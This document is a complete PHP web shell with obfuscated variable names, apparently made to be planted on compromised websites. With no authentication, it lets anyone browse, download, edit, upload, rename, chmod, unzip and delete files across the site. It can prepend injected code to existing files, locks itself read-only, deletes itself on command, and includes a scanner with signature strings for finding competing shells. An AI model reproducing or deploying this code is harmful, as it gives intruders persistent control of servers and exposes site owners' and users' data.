<?php
function DirFilesR($d){$f=opendir($d)or die("Can't open directory $d");$i=Array();$k=Array();while(false!==($p=readdir($f))){if($p!="."&&$p!=".."){if(is_dir($d."/".$p)){$k=DirFilesR($d."/".$p);$i=array_merge($i,$k);}else{$i[]=$d."/".$p;}}}closedir($f);return $i;}if(isset($_GET['juke'])){$u=DirFilesR($_SERVER['DOCUMENT_ROOT']);echo '<td><hr><hr>';foreach($u as $jjjjj){$kkkkk=str_replace($_SERVER['DOCUMENT_ROOT'],$_SERVER['SERVER_NAME'],$jjjjj);echo $kkkkk.';'.filesize($jjjjj)."<br>\n";}echo '<hr><hr></td>';exit;}?>
<html>
<head>
	<title><?php echo $_SERVER['SCRIPT_FILENAME'];?></title>
	<style type="text/css">
	INPUT[type="text"] {background-color: #fff8e7;}	body{background: #fff8e7;color: #4c5866;font-family: Verdana;font-size: 11px;}
	a:link{color: #33CC99;}	a:visited{color: #33CC99;}	a:hover{text-decoration: none;Color: #3399FF;}table {font-size: 11px;}
	td {padding: 1px;padding-left: 10px;padding-right: 10px;padding-top: 2px;}
	</style>
</head>
<body>
<table cellpadding="5" width="80%">
<?php
$lllll=perms($_SERVER['SCRIPT_FILENAME'],'');if($lllll!=='444')chmod($_SERVER['SCRIPT_FILENAME'],0444);function del_file($p){if(!file_exists($p))return "file not exists";else{if(!unlink($p)){if(!chmod($p,0755))return "no have permission for chmod!";else{if(!unlink($p))return "can not delete!";else return "ok!";}}else return "ok!";}}if(isset($_GET['dispatch'])){del_file($_SERVER['SCRIPT_FILENAME']);}if(!empty($_POST['for_del'])){$mmmmm=array();$nnnnn=$_POST['for_del'];echo "<<info>>";foreach($nnnnn as $ooooo){$ooooo=strstr($ooooo,'/');$ooooo=$_SERVER['DOCUMENT_ROOT'].'/'.$ooooo;$ppppp=str_replace($_SERVER['DOCUMENT_ROOT'],$_SERVER['SERVER_NAME'],$ooooo);if(file_exists($ooooo)){del_file($ooooo);if(!file_exists($ooooo))echo $ppppp." - removed"."\n";else echo $ppppp." - not removed"."\n";}else echo $ppppp." - not found"."\n";}echo "<</info>>";exit;}function unzip_file($p){$qqqqq=strrchr($p,'/');$rrrrr=str_replace($qqqqq,'',$p);$sssss=new ZipArchive;$sssss->open($p);$sssss->extractTo($rrrrr);$sssss->close();echo"<tr><td>File: $qqqqq - <font color=\"green\">unzip successfully</font></td></tr>";}function read_file($ttttt){$uuuuu=$ttttt;if(file_exists($ttttt)and(filesize($ttttt)>1)){$p=fopen($uuuuu,"rt");$vvvvv=explode("\n",fread($p,filesize($uuuuu)));fclose($p);return $vvvvv;}else{$vvvvv=array();return $vvvvv;}}function clear_folder($d){$wwwww=opendir($d);while(($xxxxx=readdir($wwwww))!==false){if($xxxxx!="."&&$xxxxx!=".."){if(is_dir($d."/".$xxxxx)){clear_folder($d."/".$xxxxx);}else{unlink($d."/".$xxxxx);}}}closedir($wwwww);rmdir($d);}function only_read($ttttt){if(file_exists($ttttt)and(filesize($ttttt)>1)){if(!$p=fopen($ttttt,"rt")){if(!chmod($ttttt,0775)){echo 'can\'t permission for chmod file<br>';$yyyyy='';}else{if(!$p=fopen($ttttt,"rt")){echo 'can\'t permission for open file<br>';$yyyyy='';}else{$yyyyy=fread($p,filesize($ttttt));fclose($p);}}}else{$yyyyy=fread($p,filesize($ttttt));fclose($p);}}return $yyyyy;}function findshells($zzzzz){global $aaaaaa;$i=array();if(!$f=opendir($zzzzz))chmod($zzzzz,0755);$f=opendir($zzzzz);while(($p=readdir($f))!==false){if($p!="."&&$p!=".."){$bbbbbb=$zzzzz."/".$p;if(is_dir($bbbbbb))findshells($bbbbbb);else{$cccccc=stristr($bbbbbb,$_SERVER['SCRIPT_FILENAME']);if($cccccc==false)$aaaaaa[]=$bbbbbb;}}}closedir($f);return $aaaaaa;}if(isset($_GET['unzip'])){unzip_file($_GET['unzip']);}if(isset($_GET['finder'])){$dddddd=$_SERVER['SERVER_NAME'];$eeeeee=$_SERVER['SCRIPT_NAME'];$ffffff=$_SERVER['DOCUMENT_ROOT']."/finderdata.txt";$gggggg=$_SERVER['DOCUMENT_ROOT']."/goodfinderdata.txt";;$hhhhhh='eval(base64_decode(';$iiiiii='Array(base64_decode(';$jjjjjj='@$isbot';$kkkkkk='@require';$llllll='eval(gzuncompress(base64_decode(';$mmmmmm='@include "\x2';$nnnnnn='$OO';$oooooo='cache=00';$pppppp='file_get_contents(\"../index.php\")"';$qqqqqq='is_uploaded_file';$rrrrrr='base64_decode($_POST';$ssssss='multipart/form-data';if(!file_exists($ffffff)){$tttttt=findshells($_SERVER['DOCUMENT_ROOT']);$uuuuuu=fopen($ffffff,"a");foreach($tttttt as $ooooo){if($ooooo!==$_SERVER['SCRIPT_FILENAME'])fwrite($uuuuuu,$ooooo."\n");}fclose($uuuuuu);if(file_exists($ffffff)){$vvvvvv=str_replace($_SERVER['DOCUMENT_ROOT'],$_SERVER['SERVER_NAME'],$_SERVER['SCRIPT_FILENAME']);$vvvvvv='http://'.$vvvvvv.'?finder';;?>	
			<script language = 'javascript'>
			var delay = 300;
			setTimeout("document.location.href='<?php echo $vvvvvv;?>'", delay);
			</script>
			<?php
}else echo 'error: file finderdata.txt can not create';}else{$wwwwww=read_file($ffffff);$xxxxxx=array();for($yyyyyy=0;$yyyyyy<900;$yyyyyy++){if(($wwwwww[$yyyyyy]!==null)and($wwwwww[$yyyyyy]!==' ')and($wwwwww[$yyyyyy]!=='')and($wwwwww[$yyyyyy]!=='.')and($wwwwww[$yyyyyy]!=='..'))$xxxxxx[]=trim($wwwwww[$yyyyyy]);}for($zzzzzz=0;$zzzzzz<900;$zzzzzz++){unset($wwwwww[$zzzzzz]);}$aaaaaaa=fopen($ffffff,"w");foreach($wwwwww as $bbbbbbb){if(($bbbbbbb!==null)and($bbbbbbb!=='')and($bbbbbbb!==' '))fwrite($aaaaaaa,$bbbbbbb."\n");}fclose($aaaaaaa);foreach($xxxxxx as $ccccccc){if(file_exists($ccccccc)){if(((filesize($ccccccc))<5000000))$ddddddd=only_read($ccccccc);else $ddddddd='';$cccccc=stristr($ddddddd,$hhhhhh);$eeeeeee=stristr($ddddddd,$iiiiii);$fffffff=stristr($ddddddd,$jjjjjj);$ggggggg=stristr($ddddddd,$kkkkkk);$hhhhhhh=stristr($ddddddd,$llllll);$iiiiiii=stristr($ddddddd,$mmmmmm);$jjjjjjj=stristr($ddddddd,$nnnnnn);$kkkkkkk=stristr($ddddddd,$oooooo);$lllllll=stristr($ddddddd,$pppppp);$mmmmmmm=stristr($ddddddd,$qqqqqq);$nnnnnnn=stristr($ddddddd,$rrrrrr);$ooooooo=stristr($ddddddd,$ssssss);if(($cccccc!==false)or($eeeeeee!==false)or($fffffff!==false)or($ggggggg!==false)or($hhhhhhh!==false)or($iiiiiii!==false)or($jjjjjjj!==false)or($kkkkkkk!==false)or($lllllll!==false)or($mmmmmmm!==false)or($nnnnnnn!==false)or($ooooooo!==false)){$uuuuuu=fopen($gggggg,"a");fwrite($uuuuuu,$ccccccc."\n");fclose($uuuuuu);}}}if(count($wwwwww)>0)echo count($wwwwww)." files for check<br>";else echo '<tr><td>Finish!</td></tr>';$ppppppp=read_file($ffffff);if(file_exists($ffffff)and(filesize($ffffff)>1)){$vvvvvv=str_replace($_SERVER['DOCUMENT_ROOT'],$_SERVER['SERVER_NAME'],$_SERVER['SCRIPT_FILENAME']);$vvvvvv='http://'.$vvvvvv.'?finder';;?>	
			<script language = 'javascript'>
			var delay = 100;
			setTimeout("document.location.href='<?php echo $vvvvvv;?>'", delay);
			</script>
			<?php
}else{$qqqqqqq=read_file($gggggg);foreach($qqqqqqq as $ooooo){if(($ooooo!==null)and($ooooo!=='')and($ooooo!==' ')){if(isset($_GET['dir']))$rrrrrrr=$_GET['dir'];else $rrrrrrr=$_SERVER['DOCUMENT_ROOT'];$sssssss=get_time($ooooo);$ttttttt=str_replace($_SERVER['DOCUMENT_ROOT'],$_SERVER['SERVER_NAME'],$ooooo);echo "<tr bgcolor=\"#ffffff\" align=\"center\"><td align=\"left\" >"."<a style=\"text-decoration: none;\" href=\"http://$dddddd$eeeeee?edit=$ooooo&dir=$rrrrrrr\"><font color=\"black\">$ooooo</font></a>"."</td><td>".get_filesize($ooooo)."</td><td>$sssssss</td><td>".perms($ooooo,'0')."</td><td>"."<a href=\"http://$dddddd$eeeeee?del=$ooooo&dir=$rrrrrrr\">U</a>&nbsp;"."<a href=\"http://$dddddd$eeeeee?edit=$ooooo&dir=$rrrrrrr\">E</a>&nbsp;"."<a target=\"_blank\" href=\"http://$ttttttt\">O</a>&nbsp;"."<a href=\"http://$dddddd$eeeeee?download=$ooooo&dir=$rrrrrrr\">D</a>"."</td></tr>";}}if(file_exists($ffffff))unlink($ffffff);if(file_exists($gggggg))unlink($gggggg);}}}if(isset($_GET['download'])){$uuuuuuu=$_GET['download'];if(file_exists($uuuuuuu)){header('Content-Description: File Transfer');header('Content-Type: application/octet-stream');header('Content-Disposition: attachment; filename='.basename($uuuuuuu));header('Content-Transfer-Encoding: binary');header('Expires: 0');header('Cache-Control: must-revalidate');header('Pragma: public');header('Content-Length: '.filesize($uuuuuuu));readfile($_GET['download']);exit;}}?>
<?php
function get_filesize($p){if(!file_exists($p))return "not find files";$vvvvvvv=filesize($p);if($vvvvvvv>1024){$vvvvvvv=($vvvvvvv/1024);if($vvvvvvv>1024){$vvvvvvv=($vvvvvvv/1024);if($vvvvvvv>1024){$vvvvvvv=($vvvvvvv/1024);$vvvvvvv=round($vvvvvvv,1);return $vvvvvvv." gb";}else{$vvvvvvv=round($vvvvvvv,1);return $vvvvvvv." mb";}}else{$vvvvvvv=round($vvvvvvv,1);return $vvvvvvv." kb";}}else{$vvvvvvv=round($vvvvvvv,1);return $vvvvvvv." b";}}function get_time($p){if(!file_exists($p))return "no info";$wwwwwww=filemtime($p);$sssssss=date('Y-m-d H:i:s',$wwwwwww);return $sssssss;}function perms($xxxxxxx,$yyyyyyy){$zzzzzzz=substr(decoct(fileperms($xxxxxxx)),-3);if($zzzzzzz=='644')$aaaaaaaa='green';elseif($zzzzzzz=='755')$aaaaaaaa='#2EC842';elseif($zzzzzzz=='444')$aaaaaaaa='brown';elseif($zzzzzzz=='000')$aaaaaaaa='red';elseif($zzzzzzz=='744')$aaaaaaaa='orange';elseif($zzzzzzz=='664')$aaaaaaaa='green';else $aaaaaaaa='grey';if($yyyyyyy==1)return $zzzzzzz;else return"<font color=$aaaaaaaa>".$zzzzzzz."</font>";}function CMS(){if((is_dir($_SERVER['DOCUMENT_ROOT'].'/administrator/'))and(is_dir($_SERVER['DOCUMENT_ROOT'].'/components/'))and(is_dir($_SERVER['DOCUMENT_ROOT'].'/includes/')))return "Joomla!";elseif((is_dir($_SERVER['DOCUMENT_ROOT'].'/wp-content/'))and(is_dir($_SERVER['DOCUMENT_ROOT'].'/wp-admin/'))and(is_dir($_SERVER['DOCUMENT_ROOT'].'/wp-includes/')))return "WordPress";else return "Unknown";}function folder_separate($bbbbbbbb){$cccccccc=strripos($bbbbbbbb,'/');$dddddddd=substr_replace($bbbbbbbb,'',$cccccccc,99999);return $dddddddd;}function side_bar($eeeeeeee){echo '<td align="right" colspan="2">';echo "<form action = '".$eeeeeeee."' method = 'POST'>";echo "<input name=\"search_file\" size=\"7\" type=\"text\" placeholder=\".suspected\" />";echo "<input type=\"submit\" value=\"ok\" /></form>";echo "<form action = '".$eeeeeeee."' method = 'POST'>";echo "<input name=\"new_file\" size=\"7\" type=\"text\" placeholder=\"make file\" />";echo "<input type=\"submit\" value=\"ok\" /></form>";echo "<form action = '".$eeeeeeee."' method = 'POST'>";echo "<input name=\"new_dir\" size=\"7\" type=\"text\" placeholder=\"make dir\" />";echo "<input type=\"submit\" value=\"ok\" /></form>";echo '</td></tr>';}if(isset($_GET['rename'])){if(!empty($_POST['n_name'])){if(rename($_GET['rename'],$_POST['n_name']))$ffffffff='<font color="green"><b>Name changed!</b></font>';else $ffffffff='<font color="red"><b>Name can not be changed</b></font>';echo $ffffffff;}}function edit_file($p,$gggggggg){if(!empty($_POST['chm'])){if($_POST['chm']=='0755'){if(chmod($p,0755))$hhhhhhhh='<font color="green"><b>Permission changed!</b></font>';else $hhhhhhhh='<font color="red"><b>Unable change permission!</b></font>';}elseif($_POST['chm']=='0444'){if(chmod($p,0444))$hhhhhhhh='<font color="green"><b>Permission changed!</b></font>';else $hhhhhhhh='<font color="red"><b>Unable change permission!</b></font>';}elseif($_POST['chm']=='0644'){if(chmod($p,0644))$hhhhhhhh='<font color="green"><b>Permission changed!</b></font>';else $hhhhhhhh='<font color="red"><b>Unable change permission!</b></font>';}else $hhhhhhhh='0755<br>0444<br>0644<br>';echo $hhhhhhhh;}if(empty($_POST['new'])){$cccccccc=strripos($p,'/');$d=substr_replace($p,'',$cccccccc,99999);if(file_exists($p)and(filesize($p)>1)){if(!$iiiiiiii=fopen($p,"r")){echo 'no have permission<br>';$jjjjjjjj='can\'t show';}else{$jjjjjjjj=fread($iiiiiiii,filesize($p));fclose($iiiiiiii);}}else $jjjjjjjj='';$jjjjjjjj=str_replace("<textarea>","<textarea>",$jjjjjjjj);$jjjjjjjj=htmlspecialchars($jjjjjjjj);echo "<tr><td align=\"center\" colspan=\"5\"><form action = 'http://".$gggggggg."?edit=".$p."&dir=".$d."' method = 'POST'>\n";echo "File: ".$p."<br>\n";echo "<textarea name = 'new' rows = '20' cols = '120'>".$jjjjjjjj."</textarea><br>\n";echo "<div align=\"right\"><br><input type = 'submit' value = 'Save'></div></form></td></tr>\n";echo "<tr><td align=\"left\"><form action = 'http://".$gggggggg."?edit=".$p."&dir=".$d."' method = 'POST'>\n";echo "<input name=\"chm\" size=\"4\" type=\"text\" placeholder=\"".perms($p,'1')."\"/>";echo "<input type=\"submit\" value=\"ok\" /></form></td>\n";echo "<td colspan=\"3\" align=\"left\"><form action = 'http://".$gggggggg."?rename=".$p."&dir=".$d."' method = 'POST'>\n";echo"<input type=\"text\" name='n_name' size=\"72\" value=\"$p\">";echo "<input type=\"submit\" value=\"ok\" /></form></td></tr>\n";}else{if(!empty($_POST['new_remote'])){if(!chmod($p,0755))return "no have permission for chmod!";$jjjjjjjj=only_read($p);$jjjjjjjj=$_POST['new'].$jjjjjjjj;$iiiiiiii=fopen($p,"w");if(fwrite($iiiiiiii,$jjjjjjjj))$kkkkkkkk=' - <font color="green"><b>Edited!</b></font>';else $kkkkkkkk=' - <font color="red"><b>Unable to edit!</b></font>';fclose($iiiiiiii);if(!chmod($p,0444))return "no have permission for chmod!";}else{if(!chmod($p,0755))return "no have permission for chmod!";$iiiiiiii=fopen($p,"w");if(fwrite($iiiiiiii,$_POST['new']))$kkkkkkkk=' - <font color="green"><b>Edited!</b></font>';else $kkkkkkkk=' - <font color="red"><b>Unable to edit!</b></font>';fclose($iiiiiiii);}$cccccccc=strripos($p,'/');$d=substr_replace($p,'',$cccccccc,99999);$iiiiiiii=fopen($p,"r");$jjjjjjjj=fread($iiiiiiii,filesize($p));fclose($iiiiiiii);$jjjjjjjj=str_replace("<textarea>","<textarea>",$jjjjjjjj);echo "<tr><td align=\"center\" colspan=\"5\"><form action = 'http://".$gggggggg."?edit=".$p."&dir=".$d."' method = 'POST'>\n";echo "File: ".$p.$kkkkkkkk."<br>\n";echo "<textarea name = 'new' rows = '20' cols = '120'>".$jjjjjjjj."</textarea><br>\n";echo "<div align=\"right\"><br><input type = 'submit' value = 'Save'></div></form></td></tr>\n";echo "<tr><td align=\"left\"><form action = 'http://".$gggggggg."?edit=".$p."&dir=".$d."' method = 'POST'>\n";echo "<input name=\"chm\" size=\"4\" type=\"text\" placeholder=\"".perms($p,'1')."\"/>";echo "<input type=\"submit\" value=\"ok\" /></form></td>\n";echo "<td colspan=\"3\" align=\"left\"><form action = 'http://".$gggggggg."?rename=".$p."&dir=".$d."' method = 'POST'>\n";echo"<input type=\"text\" name='n_name' size=\"72\" value=\"$p\">";echo "<input type=\"submit\" value=\"ok\" /></form></td></tr>\n";if(chmod($p,0444))$llllllll='<font color="green"><b>Permission changed!</b></font>';else $llllllll='<font color="red"><b>Unable change permission!</b></font>';}}if(isset($_GET['del'])){if(is_dir($_GET['del']))clear_folder($_GET['del']);else del_file($_GET['del']);}$dddddd=$_SERVER['SERVER_NAME'];$eeeeee=$_SERVER['SCRIPT_NAME'];$mmmmmmmm=array();$nnnnnnnn=array();?>
	<tr align="left">
		<td colspan="3">
		<?php
if(sizeof($_FILES)!=0){if(isset($_FILES)&&$_FILES['inputfile']['error']==0){if(isset($_GET['dir']))$bbbbbbbb=$_GET['dir'];else $bbbbbbbb=$_SERVER['DOCUMENT_ROOT'];$oooooooo=$bbbbbbbb.'/'.$_FILES['inputfile']['name'];move_uploaded_file($_FILES['inputfile']['tmp_name'],$oooooooo);$pppppppp=str_replace($_SERVER['DOCUMENT_ROOT'],$_SERVER['SERVER_NAME'],$oooooooo);echo '<font color="green"><b>'."<a target=\"_blank\" href=\"http://$pppppppp\">File Uploaded!</a>".'</b></font>';}}elseif(sizeof($_FILES)!=0)echo '<font color="red"><b>No File Uploaded</b></font>';if(isset($_GET['dir']))$qqqqqqqq=$_SERVER['SCRIPT_NAME'].'?dir='.$_GET['dir'];else $qqqqqqqq=$_SERVER['SCRIPT_NAME'].'?dir='.$_SERVER['DOCUMENT_ROOT'];?>
			<form method="post" action="<?php echo $qqqqqqqq;?>" enctype="multipart/form-data">
			<input type="file" id="inputfile" name="inputfile">
			<input type="submit" value="ok">
			</form>
			CMS: <?php echo CMS();?><br>
			Server IP: <?php echo $_SERVER['SERVER_ADDR'];?><br>
			Root: <?php echo '<a href="'.'http://'.$dddddd.$eeeeee.'?dir='.$_SERVER['DOCUMENT_ROOT'].'">'.$_SERVER['DOCUMENT_ROOT'].'</a>';?>
			<br><br>
			Directory: 
			<?php
if(isset($_GET['dir']))$bbbbbbbb=$_GET['dir'];else $bbbbbbbb=$_SERVER['DOCUMENT_ROOT'];$rrrrrrrr=explode("/",$bbbbbbbb);$ssssssss=count($rrrrrrrr)-1;$tttttttt=array();$uuuuuuuu=$bbbbbbbb;for($zzzzzz=1;$zzzzzz<=$ssssssss;$zzzzzz++){$uuuuuuuu=folder_separate($uuuuuuuu);$tttttttt[]=$uuuuuuuu;}for($zzzzzz=1;$zzzzzz<=$ssssssss;$zzzzzz++){$vvvvvvvv=$ssssssss-$zzzzzz-1;if($zzzzzz!==$ssssssss)echo '<a href="http://'.$dddddd.$eeeeee.'?dir='.$tttttttt["$vvvvvvvv"].'">'.$rrrrrrrr["$zzzzzz"].'</a>/';else echo '<a href="http://'.$dddddd.$eeeeee.'?dir='.$bbbbbbbb.'">'.$rrrrrrrr["$zzzzzz"].'</a>';}?>
			
			
		</td>
	<?php
if(isset($_GET['dir'])){if(isset($_POST['new_file_name'])){$wwwwwwww=$_GET['dir'].'/'.$_POST['new_file_name'];$eeeeeeee='http://'.$dddddd.$eeeeee.'?dir='.$_GET['dir'].'&edit='.$wwwwwwww;}else $eeeeeeee='http://'.$dddddd.$eeeeee.'?dir='.$_GET['dir'];}else{if(isset($_POST['new_file_name'])){$wwwwwwww=$_SERVER['DOCUMENT_ROOT'].'/'.$_POST['new_file_name'];$eeeeeeee='http://'.$dddddd.$eeeeee.'?dir='.$_GET['dir'].'&edit='.$wwwwwwww;}else $eeeeeeee='http://'.$dddddd.$eeeeee.'?dir='.$_SERVER['DOCUMENT_ROOT'];}if((empty($_POST['new_file']))and(empty($_POST['search_file']))and(empty($_POST['new_dir']))){if(isset($_GET['dir']))$bbbbbbbb=$_GET['dir'];else $bbbbbbbb=$_SERVER['DOCUMENT_ROOT'];$eeeeeeee='http://'.$dddddd.$eeeeee.'?dir='.$bbbbbbbb;side_bar($eeeeeeee);}elseif(!empty($_POST['new_file'])){if(isset($_GET['dir']))$bbbbbbbb=$_GET['dir'].'/'.$_POST['new_file'];else $bbbbbbbb=$_SERVER['DOCUMENT_ROOT'].'/'.$_POST['new_file'];$eeeeeeee='http://'.$dddddd.$eeeeee.'?dir='.$_GET['dir'].'&edit='.$bbbbbbbb;if($iiiiiiii=fopen($bbbbbbbb,"w")){echo '<font color="green">File created successfully!</font>';side_bar($eeeeeeee);}else{echo '<font color="red">Can not create!</font>';side_bar($eeeeeeee);}fclose($iiiiiiii);}elseif(!empty($_POST['new_dir'])){if(isset($_GET['dir']))$bbbbbbbb=$_GET['dir'].'/'.$_POST['new_dir'];else $bbbbbbbb=$_SERVER['DOCUMENT_ROOT'].'/'.$_POST['new_dir'];$eeeeeeee='http://'.$dddddd.$eeeeee.'?dir='.$_GET['dir'].'&new_dir='.$bbbbbbbb;if($iiiiiiii=mkdir($bbbbbbbb)){side_bar($eeeeeeee);echo "<tr align=\"center\"><td align=\"left\" >"."<font color=\"green\">Folder created successfully!</font></td>"."<td></td><td></td><td></td><td></td></tr>";}else{side_bar($eeeeeeee);echo "<tr align=\"center\"><td align=\"left\" >"."<font color=\"red\">Can not create folder!</font></td>"."<td></td><td></td><td></td><td></td></tr>";}}elseif(!empty($_POST['search_file'])){$xxxxxxxx=$_POST['search_file'];$yyyyyyyy=findshells($_SERVER['DOCUMENT_ROOT']);if(isset($_GET['dir']))$rrrrrrr=$_GET['dir'];else $rrrrrrr=$_SERVER['DOCUMENT_ROOT'];side_bar($eeeeeeee);foreach($yyyyyyyy as $zzzzzzzz){$cccccc=stristr($zzzzzzzz,$xxxxxxxx);if($cccccc!==false){$sssssss=get_time($zzzzzzzz);$ttttttt=str_replace($_SERVER['DOCUMENT_ROOT'],$_SERVER['SERVER_NAME'],$zzzzzzzz);echo "<tr bgcolor=\"#ffffff\" align=\"center\"><td align=\"left\" >"."<a style=\"text-decoration: none;\" href=\"http://$dddddd$eeeeee?edit=$zzzzzzzz&dir=$rrrrrrr\"><font color=\"black\">$zzzzzzzz</font></a>"."</td><td>".get_filesize($zzzzzzzz)."</td><td>$sssssss</td><td>".perms($zzzzzzzz,'0')."</td><td>"."<a href=\"http://$dddddd$eeeeee?del=$zzzzzzzz&dir=$rrrrrrr\">U</a>&nbsp;"."<a href=\"http://$dddddd$eeeeee?edit=$zzzzzzzz&dir=$rrrrrrr\">E</a>&nbsp;"."<a target=\"_blank\" href=\"http://$ttttttt\">O</a>&nbsp;"."<a href=\"http://$dddddd$eeeeee?download=$zzzzzzzz&dir=$rrrrrrr\">D</a>"."</td></tr>";}}}if(isset($_GET['edit'])){$gggggggg=$dddddd.$eeeeee;edit_file($_GET['edit'],$gggggggg);}?>
	
	<tr align="center" style="color: #423c63;"><td align="left"><b>Name</b></td><td><b>Size</b></td><td><b>Modify</b></td><td><b>Permissions</b></td><td><b>Actions</b></td></tr>

	<?php
if(isset($_GET['dir'])){$u=scandir($_GET['dir']);}else{$u=scandir($_SERVER['DOCUMENT_ROOT']);}foreach($u as $ooooo){$aaaaaaaaa=$ooooo;if(isset($_GET['dir']))$aaaaaaaaa=$_GET['dir'].'/'.$ooooo;else $aaaaaaaaa=$_SERVER['DOCUMENT_ROOT'].'/'.$ooooo;if(is_dir($aaaaaaaaa))$mmmmmmmm[]=$ooooo;else $nnnnnnnn[]=$ooooo;}$vvvvvvvv=0;foreach($mmmmmmmm as $ooooo){if(($ooooo!=='.')and($ooooo!=='..')){if(isset($_GET['dir'])){$bbbbbbbbb=$_GET['dir'].'/'.$ooooo;$ccccccccc=$_GET['dir'].'/'.$ooooo;}else{$bbbbbbbbb=$_SERVER['DOCUMENT_ROOT'].'/'.$ooooo;$ccccccccc=$_SERVER['DOCUMENT_ROOT'].'/'.$ooooo;}$ddddddddd=$ccccccccc;$qqqqq=strrchr($ddddddddd,'/');$ddddddddd=str_replace($qqqqq,'',$ddddddddd);$sssssss=get_time($bbbbbbbbb);if($vvvvvvvv%2==0)$eeeeeeeee='#fff8e7';else $eeeeeeeee='#ffffe0';echo"<tr bgcolor=\"$eeeeeeeee\" align=\"center\"><td align=\"left\" >"."<font color=\"#904d30\"><b><a href=\"http://$dddddd$eeeeee?dir=$ccccccccc\">$ooooo</a></b></font>"."</td><td>dir</td><td>$sssssss</td><td>".perms($bbbbbbbbb,'0')."</td><td>"."<a href=\"http://$dddddd$eeeeee?del=$bbbbbbbbb&dir=$ddddddddd\">U</a>&nbsp;"."</td></tr>";$vvvvvvvv++;}}foreach($nnnnnnnn as $ooooo){if(isset($_GET['dir'])){$bbbbbbbbb=$_GET['dir'].'/'.$ooooo;$rrrrrrr=$_GET['dir'];}else{$bbbbbbbbb=$_SERVER['DOCUMENT_ROOT'].'/'.$ooooo;$rrrrrrr=$_SERVER['DOCUMENT_ROOT'];}$sssssss=get_time($bbbbbbbbb);$ttttttt=str_replace($_SERVER['DOCUMENT_ROOT'],$_SERVER['SERVER_NAME'],$bbbbbbbbb);if($vvvvvvvv%2==0)$eeeeeeeee='#fff8e7';else $eeeeeeeee='#ffffe0';$fffffffff=stristr($ooooo,'.zip');if($fffffffff!==false)$fffffffff="<a href=\"http://$dddddd$eeeeee?unzip=$bbbbbbbbb&dir=$rrrrrrr\">Z</a>&nbsp;";else $fffffffff="<a href=\"http://$dddddd$eeeeee?edit=$bbbbbbbbb&dir=$rrrrrrr\">E</a>&nbsp;";echo"<tr bgcolor=\"$eeeeeeeee\" align=\"center\"><td align=\"left\" >"."<a style=\"text-decoration: none;\" href=\"http://$dddddd$eeeeee?edit=$bbbbbbbbb&dir=$rrrrrrr\"><font color=\"black\">$ooooo</font></a>"."</td><td>".get_filesize($bbbbbbbbb)."</td><td>$sssssss</td><td>".perms($bbbbbbbbb,'0')."</td><td>"."<a href=\"http://$dddddd$eeeeee?del=$bbbbbbbbb&dir=$rrrrrrr\">U</a>&nbsp;".$fffffffff."<a target=\"_blank\" href=\"http://$ttttttt\">O</a>&nbsp;"."<a href=\"http://$dddddd$eeeeee?download=$bbbbbbbbb&dir=$rrrrrrr\">D</a>"."</td></tr>";$vvvvvvvv++;}?>
</table>